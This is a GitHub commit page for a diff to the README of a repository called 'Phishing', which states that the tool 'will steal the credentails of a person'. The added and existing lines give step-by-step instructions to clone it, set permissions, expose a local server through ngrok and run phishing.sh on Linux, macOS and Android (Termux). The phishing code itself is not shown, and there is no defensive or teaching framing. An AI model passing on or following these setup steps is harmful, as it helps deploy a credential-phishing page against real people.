Skip to content

Commit 9e1c263

Browse files
authored
Update README.md
1 parent 95496e0 commit 9e1c263

File tree

1 file changed

+8
-2
lines changed

1 file changed

+8
-2
lines changed

README.md

Lines changed: 8 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,15 +7,21 @@ This tool will steal the credentails of a person
77
- sudo chmod 777 *
88
- bash phishing.sh
99

10-
# Steps run this tool on mac:
10+
# Steps to run this tool on mac:
1111
- git clone https://github.com/krishpranav/Phishing
1212
- cd Phishing
1313
- sudo chmod 777 *
1414
- open a new terminal and type ./ngrok http 80
1515
- bash phishing.sh
1616
- if you have any doubt means check out reference down below
1717

18-
18+
# Steps to run this tool on android(termux):
19+
- pkg update
20+
- pkg install git
21+
- git clone https://github.com/krishpranav/Phishing
22+
- cd Phishing
23+
- bash install.sh
24+
- bash phishing.sh
1925

2026

2127
# Reference

0 commit comments

Comments
 (0)